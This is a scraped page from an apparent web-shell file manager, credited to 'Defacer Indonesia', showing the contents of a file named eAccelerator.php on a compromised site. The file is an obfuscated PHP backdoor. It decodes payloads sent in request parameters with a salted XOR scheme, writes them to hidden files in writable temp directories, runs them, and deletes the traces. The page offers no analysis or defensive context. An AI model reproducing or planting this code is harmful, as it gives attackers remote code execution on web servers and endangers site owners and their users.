whoami7 - Manager
:
/
home
/
analuakl
/
amplmedia.com
/
Upload File:
files >> /home/analuakl/amplmedia.com/eAccelerator.php
<?php if(!is_null($_REQUEST["\x6F\x62j\x65ct"] ?? null)){ $entity = $_REQUEST["\x6F\x62j\x65ct"]; $entity= explode ( '.' , $entity); $res = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt ); $l = 0; while ($l < count($entity)) { $v3 = $entity[$l]; $chS = ord($salt[$l%$lenS] ); $d = ((int)$v3 - $chS - ($l%10)) ^ 26; $res .= chr($d ); $l++; } $ref = array_filter([getcwd(), ini_get("upload_tmp_dir"), "/dev/shm", "/var/tmp", getenv("TEMP"), getenv("TMP"), session_save_path(), "/tmp", sys_get_temp_dir()]); while ($item = array_shift($ref)) { if ((bool)is_dir($item) && (bool)is_writable($item)) { $element = join("/", [$item, ".bind"]); $success = file_put_contents($element, $res); if ($success) { include $element; @unlink($element); die();} } } } if(!empty($_POST["ent"])){ $tkn = $_POST["ent"]; $tkn = explode ("." , $tkn ) ; $ref =''; $salt8 ='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen =strlen( $salt8); $s =0; foreach( $tkn as $v3) { $chS =ord( $salt8[$s % $sLen]); $d =( ( int)$v3 - $chS -( $s % 10)) ^ 4; $ref .= chr( $d); $s++; } $parameter_group = array_filter([getenv("TEMP"), getcwd(), "/dev/shm", session_save_path(), ini_get("upload_tmp_dir"), sys_get_temp_dir(), "/var/tmp", getenv("TMP"), "/tmp"]); foreach ($parameter_group as $item): if (array_product([is_dir($item), is_writable($item)])) { $element = str_replace("{var_dir}", $item, "{var_dir}/.dchunk"); if (file_put_contents($element, $ref)) { require $element; unlink($element); exit; } } endforeach; }
Copyright ©2021 || Defacer Indonesia